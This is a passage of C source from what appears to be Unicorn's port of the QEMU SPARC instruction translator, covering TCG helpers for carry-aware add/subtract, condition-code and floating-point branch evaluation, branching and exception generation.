*tcg_ctx = dc->uc->tcg_ctx; rd = QFPREG(rd); rs = QFPREG(rs); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_fpr[rs / 2]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + 1], tcg_ctx->cpu_fpr[rs / 2 + 1]); gen_update_fprs_dirty(dc, rd); } #endif /* moves */ #ifdef TARGET_SPARC64 #define hypervisor(dc) (dc->hypervisor) #define supervisor(dc) (dc->supervisor | dc->hypervisor) #else #define supervisor(dc) (dc->supervisor) #endif #ifdef TARGET_SPARC64 #ifndef TARGET_ABI32 #define AM_CHECK(dc) ((dc)->address_mask_32bit) #else #define AM_CHECK(dc) (1) #endif #endif static inline void gen_address_mask(DisasContext *dc, TCGv addr) { #ifdef TARGET_SPARC64 TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (AM_CHECK(dc)) tcg_gen_andi_tl(tcg_ctx, addr, addr, 0xffffffffULL); #endif } static inline TCGv gen_load_gpr(DisasContext *dc, int reg) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (reg > 0) { assert(reg < 32); return tcg_ctx->cpu_regs[reg]; } else { TCGv t = get_temp_tl(dc); tcg_gen_movi_tl(tcg_ctx, t, 0); return t; } } static inline void gen_store_gpr(DisasContext *dc, int reg, TCGv v) { if (reg > 0) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; assert(reg < 32); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], v); } } static inline TCGv gen_dest_gpr(DisasContext *dc, int reg) { if (reg > 0) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; assert(reg < 32); return tcg_ctx->cpu_regs[reg]; } else { return get_temp_tl(dc); } } static inline bool use_goto_tb(DisasContext *s, target_ulong pc, target_ulong npc) { // if (unlikely(s->base.singlestep_enabled || singlestep)) { if (unlikely(s->base.singlestep_enabled)) { return false; } return (pc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) && (npc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong pc, target_ulong npc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (use_goto_tb(s, pc, npc)) { /* jump to same page: we can use a direct jump */ tcg_gen_goto_tb(tcg_ctx, tb_num); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, npc); tcg_gen_exit_tb(tcg_ctx, s->base.tb, tb_num); } else { /* jump to another page: currently not optimized */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, npc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } // XXX suboptimal static inline void gen_mov_reg_N(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_NEG_SHIFT, 1); } static inline void gen_mov_reg_Z(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_ZERO_SHIFT, 1); } static inline void gen_mov_reg_V(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_OVF_SHIFT, 1); } static inline void gen_mov_reg_C(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_CARRY_SHIFT, 1); } static inline void gen_op_add_cc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static TCGv_i32 gen_add32_carry32(TCGContext *tcg_ctx) { TCGv_i32 carry_32, cc_src1_32, cc_src2_32; /* Carry 
is computed from a previous add: (dst < src) */ #if TARGET_LONG_BITS == 64 cc_src1_32 = tcg_temp_new_i32(tcg_ctx); cc_src2_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src1_32, tcg_ctx->cpu_cc_dst); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src2_32, tcg_ctx->cpu_cc_src); #else cc_src1_32 = tcg_ctx->cpu_cc_dst; cc_src2_32 = tcg_ctx->cpu_cc_src; #endif carry_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); #if TARGET_LONG_BITS == 64 tcg_temp_free_i32(tcg_ctx, cc_src1_32); tcg_temp_free_i32(tcg_ctx, cc_src2_32); #endif return carry_32; } static TCGv_i32 gen_sub32_carry32(TCGContext *tcg_ctx) { TCGv_i32 carry_32, cc_src1_32, cc_src2_32; /* Carry is computed from a previous borrow: (src1 < src2) */ #if TARGET_LONG_BITS == 64 cc_src1_32 = tcg_temp_new_i32(tcg_ctx); cc_src2_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src1_32, tcg_ctx->cpu_cc_src); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src2_32, tcg_ctx->cpu_cc_src2); #else cc_src1_32 = tcg_ctx->cpu_cc_src; cc_src2_32 = tcg_ctx->cpu_cc_src2; #endif carry_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); #if TARGET_LONG_BITS == 64 tcg_temp_free_i32(tcg_ctx, cc_src1_32); tcg_temp_free_i32(tcg_ctx, cc_src2_32); #endif return carry_32; } static void gen_op_addx_int(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int update_cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 carry_32; TCGv carry; switch (dc->cc_op) { case CC_OP_DIV: case CC_OP_LOGIC: /* Carry is known to be zero. Fall back to plain ADD. */ if (update_cc) { gen_op_add_cc(tcg_ctx, dst, src1, src2); } else { tcg_gen_add_tl(tcg_ctx, dst, src1, src2); } return; case CC_OP_ADD: case CC_OP_TADD: case CC_OP_TADDTV: if (TARGET_LONG_BITS == 32) { /* We can re-use the host's hardware carry generation by using an ADD2 opcode. We discard the low part of the output. Ideally we'd combine this operation with the add that generated the carry in the first place. */ carry = tcg_temp_new(tcg_ctx); tcg_gen_add2_tl(tcg_ctx, carry, dst, tcg_ctx->cpu_cc_src, src1, tcg_ctx->cpu_cc_src2, src2); tcg_temp_free(tcg_ctx, carry); goto add_done; } carry_32 = gen_add32_carry32(tcg_ctx); break; case CC_OP_SUB: case CC_OP_TSUB: case CC_OP_TSUBTV: carry_32 = gen_sub32_carry32(tcg_ctx); break; default: /* We need external help to produce the carry. 
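The saved cc_src/cc_dst values alone cannot reproduce the carry for this cc_op (e.g. after a previous ADDX), so fall back to the helper that recomputes PSR.C from the recorded state.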
*/ carry_32 = tcg_temp_new_i32(tcg_ctx); gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); break; } #if TARGET_LONG_BITS == 64 carry = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); #else carry = carry_32; #endif tcg_gen_add_tl(tcg_ctx, dst, src1, src2); tcg_gen_add_tl(tcg_ctx, dst, dst, carry); tcg_temp_free_i32(tcg_ctx, carry_32); #if TARGET_LONG_BITS == 64 tcg_temp_free(tcg_ctx, carry); #endif add_done: if (update_cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADDX); dc->cc_op = CC_OP_ADDX; } } static inline void gen_op_sub_cc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static void gen_op_subx_int(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int update_cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 carry_32; TCGv carry; switch (dc->cc_op) { case CC_OP_DIV: case CC_OP_LOGIC: /* Carry is known to be zero. Fall back to plain SUB. */ if (update_cc) { gen_op_sub_cc(tcg_ctx, dst, src1, src2); } else { tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); } return; case CC_OP_ADD: case CC_OP_TADD: case CC_OP_TADDTV: carry_32 = gen_add32_carry32(tcg_ctx); break; case CC_OP_SUB: case CC_OP_TSUB: case CC_OP_TSUBTV: if (TARGET_LONG_BITS == 32) { /* We can re-use the host's hardware carry generation by using a SUB2 opcode. We discard the low part of the output. Ideally we'd combine this operation with the add that generated the carry in the first place. */ carry = tcg_temp_new(tcg_ctx); tcg_gen_sub2_tl(tcg_ctx, carry, dst, tcg_ctx->cpu_cc_src, src1, tcg_ctx->cpu_cc_src2, src2); tcg_temp_free(tcg_ctx, carry); goto sub_done; } carry_32 = gen_sub32_carry32(tcg_ctx); break; default: /* We need external help to produce the carry. 
*/ carry_32 = tcg_temp_new_i32(tcg_ctx); gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); break; } #if TARGET_LONG_BITS == 64 carry = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); #else carry = carry_32; #endif tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); tcg_gen_sub_tl(tcg_ctx, dst, dst, carry); tcg_temp_free_i32(tcg_ctx, carry_32); #if TARGET_LONG_BITS == 64 tcg_temp_free(tcg_ctx, carry); #endif sub_done: if (update_cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUBX); dc->cc_op = CC_OP_SUBX; } } static inline void gen_op_mulscc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { TCGv r_temp, zero, t0; r_temp = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); /* old op: if (!(env->y & 1)) T1 = 0; */ zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1, 0xffffffff); tcg_gen_andi_tl(tcg_ctx, r_temp, tcg_ctx->cpu_y, 0x1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2, 0xffffffff); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_cc_src2, r_temp, zero, zero, tcg_ctx->cpu_cc_src2); tcg_temp_free(tcg_ctx, zero); // b2 = T0 & 1; // env->y = (b2 << 31) | (env->y >> 1); tcg_gen_extract_tl(tcg_ctx, t0, tcg_ctx->cpu_y, 1, 31); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_y, t0, tcg_ctx->cpu_cc_src, 31, 1); // b1 = N ^ V; gen_mov_reg_N(tcg_ctx, t0, tcg_ctx->cpu_psr); gen_mov_reg_V(tcg_ctx, r_temp, tcg_ctx->cpu_psr); tcg_gen_xor_tl(tcg_ctx, t0, t0, r_temp); tcg_temp_free(tcg_ctx, r_temp); // T0 = (b1 << 31) | (T0 >> 1); // src1 = T0; tcg_gen_shli_tl(tcg_ctx, t0, t0, 31); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, 1); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static inline void gen_op_multiply(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2, int sign_ext) { #if TARGET_LONG_BITS == 32 if (sign_ext) { tcg_gen_muls2_tl(tcg_ctx, dst, tcg_ctx->cpu_y, src1, src2); } else { tcg_gen_mulu2_tl(tcg_ctx, dst, tcg_ctx->cpu_y, src1, src2); } #else TCGv t0 = tcg_temp_new_i64(tcg_ctx); TCGv t1 = tcg_temp_new_i64(tcg_ctx); if (sign_ext) { tcg_gen_ext32s_i64(tcg_ctx, t0, src1); tcg_gen_ext32s_i64(tcg_ctx, t1, src2); } else { tcg_gen_ext32u_i64(tcg_ctx, t0, src1); tcg_gen_ext32u_i64(tcg_ctx, t1, src2); } tcg_gen_mul_i64(tcg_ctx, dst, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_y, dst, 32); #endif } static inline void gen_op_umul(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { /* zero-extend truncated operands before multiplication */ gen_op_multiply(tcg_ctx, dst, src1, src2, 0); } static inline void gen_op_smul(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { /* sign-extend truncated operands before multiplication */ gen_op_multiply(tcg_ctx, dst, src1, src2, 1); } // 1 static inline void gen_op_eval_ba(TCGContext *tcg_ctx, TCGv dst) { tcg_gen_movi_tl(tcg_ctx, dst, 1); } // Z static inline void gen_op_eval_be(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_Z(tcg_ctx, dst, src); } // Z | (N ^ V) static inline void gen_op_eval_ble(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_N(tcg_ctx, t0, src); gen_mov_reg_V(tcg_ctx, dst, src); 
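/* At this point t0 = N and dst = V; the xor below forms N ^ V (signed less-than), and Z is then ORed in to get less-or-equal. */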
tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); gen_mov_reg_Z(tcg_ctx, t0, src); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // N ^ V static inline void gen_op_eval_bl(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_V(tcg_ctx, t0, src); gen_mov_reg_N(tcg_ctx, dst, src); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // C | Z static inline void gen_op_eval_bleu(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_Z(tcg_ctx, t0, src); gen_mov_reg_C(tcg_ctx, dst, src); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // C static inline void gen_op_eval_bcs(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_C(tcg_ctx, dst, src); } // V static inline void gen_op_eval_bvs(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_V(tcg_ctx, dst, src); } // 0 static inline void gen_op_eval_bn(TCGContext *tcg_ctx, TCGv dst) { tcg_gen_movi_tl(tcg_ctx, dst, 0); } // N static inline void gen_op_eval_bneg(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_N(tcg_ctx, dst, src); } // !Z static inline void gen_op_eval_bne(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_Z(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(Z | (N ^ V)) static inline void gen_op_eval_bg(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_ble(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(N ^ V) static inline void gen_op_eval_bge(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_bl(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(C | Z) static inline void gen_op_eval_bgu(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_bleu(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !C static inline void gen_op_eval_bcc(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_C(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !N static inline void gen_op_eval_bpos(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_N(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !V static inline void gen_op_eval_bvc(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_V(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } /* FPSR bit field FCC1 | FCC0: 0 = 1 < 2 > 3 unordered */ static inline void gen_mov_reg_FCC0(TCGContext *tcg_ctx, TCGv reg, TCGv src, unsigned int fcc_offset) { tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC0_SHIFT + fcc_offset); tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); } static inline void gen_mov_reg_FCC1(TCGContext *tcg_ctx, TCGv reg, TCGv src, unsigned int fcc_offset) { tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC1_SHIFT + fcc_offset); tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); } // !0: FCC0 | FCC1 static inline void gen_op_eval_fbne(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 1 or 2: FCC0 ^ FCC1 static inline void gen_op_eval_fblg(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 1 or 3: FCC0 static inline void gen_op_eval_fbul(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned 
int fcc_offset) { gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); } // 1: FCC0 & !FCC1 static inline void gen_op_eval_fbl(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 2 or 3: FCC1 static inline void gen_op_eval_fbug(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC1(tcg_ctx, dst, src, fcc_offset); } // 2: !FCC0 & FCC1 static inline void gen_op_eval_fbg(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); tcg_temp_free(tcg_ctx, t0); } // 3: FCC0 & FCC1 static inline void gen_op_eval_fbu(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_and_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 0: !(FCC0 | FCC1) static inline void gen_op_eval_fbe(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 3: !(FCC0 ^ FCC1) static inline void gen_op_eval_fbue(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 2: !FCC0 static inline void gen_op_eval_fbge(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !1: !(FCC0 & !FCC1) static inline void gen_op_eval_fbuge(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // 0 or 1: !FCC1 static inline void gen_op_eval_fble(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC1(tcg_ctx, dst, src, fcc_offset); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !2: !(!FCC0 & FCC1) static inline void gen_op_eval_fbule(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } // !3: !(FCC0 & FCC1) static inline void gen_op_eval_fbo(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_and_tl(tcg_ctx, dst, dst, t0); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); tcg_temp_free(tcg_ctx, t0); } static inline void gen_branch2(DisasContext *dc, target_ulong pc1, target_ulong pc2, 
TCGv r_cond) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); gen_goto_tb(dc, 0, pc1, pc1 + 4); gen_set_label(tcg_ctx, l1); gen_goto_tb(dc, 1, pc2, pc2 + 4); } static void gen_branch_a(DisasContext *dc, target_ulong pc1) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); target_ulong npc = dc->npc; tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_cond, 0, l1); gen_goto_tb(dc, 0, npc, pc1); gen_set_label(tcg_ctx, l1); gen_goto_tb(dc, 1, npc + 4, npc + 8); dc->base.is_jmp = DISAS_NORETURN; } static void gen_branch_n(DisasContext *dc, target_ulong pc1) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; target_ulong npc = dc->npc; if (likely(npc != DYNAMIC_PC)) { dc->pc = npc; dc->jump_pc[0] = pc1; dc->jump_pc[1] = npc + 4; dc->npc = JUMP_PC; } else { TCGv t, z; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_npc, tcg_ctx->cpu_npc, 4); t = tcg_const_tl(tcg_ctx, pc1); z = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_npc, tcg_ctx->cpu_cond, z, t, tcg_ctx->cpu_npc); tcg_temp_free(tcg_ctx, t); tcg_temp_free(tcg_ctx, z); dc->pc = DYNAMIC_PC; } } static inline void gen_generic_branch(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv npc0 = tcg_const_tl(tcg_ctx, dc->jump_pc[0]); TCGv npc1 = tcg_const_tl(tcg_ctx, dc->jump_pc[1]); TCGv zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_npc, tcg_ctx->cpu_cond, zero, npc0, npc1); tcg_temp_free(tcg_ctx, npc0); tcg_temp_free(tcg_ctx, npc1); tcg_temp_free(tcg_ctx, zero); } /* call this function before using the condition register as it may have been set for a jump */ static inline void flush_cond(DisasContext *dc) { if (dc->npc == JUMP_PC) { gen_generic_branch(dc); dc->npc = DYNAMIC_PC; } } static inline void save_npc(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc == JUMP_PC) { gen_generic_branch(dc); dc->npc = DYNAMIC_PC; } else if (dc->npc != DYNAMIC_PC) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, dc->npc); } } static inline void update_psr(DisasContext *dc) { if (dc->cc_op != CC_OP_FLAGS) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dc->cc_op = CC_OP_FLAGS; gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); } } static inline void save_state(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); save_npc(dc); } static void gen_exception(DisasContext *dc, int which) { TCGv_i32 t; TCGContext *tcg_ctx = dc->uc->tcg_ctx; save_state(dc); t = tcg_const_i32(tcg_ctx, which); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); dc->base.is_jmp = DISAS_NORETURN; } static void gen_check_align(TCGContext *tcg_ctx, TCGv addr, int mask) { TCGv_i32 r_mask = tcg_const_i32(tcg_ctx, mask); gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, addr, r_mask); tcg_temp_free_i32(tcg_ctx, r_mask); } static inline void gen_mov_pc_npc(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc == JUMP_PC) { gen_generic_branch(dc); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); dc->pc = DYNAMIC_PC; } else if (dc->npc == DYNAMIC_PC) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); dc->pc = DYNAMIC_PC; } else { dc->pc = dc->npc; } } static inline void gen_op_next_insn(TCGContext *tcg_ctx) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_npc, 
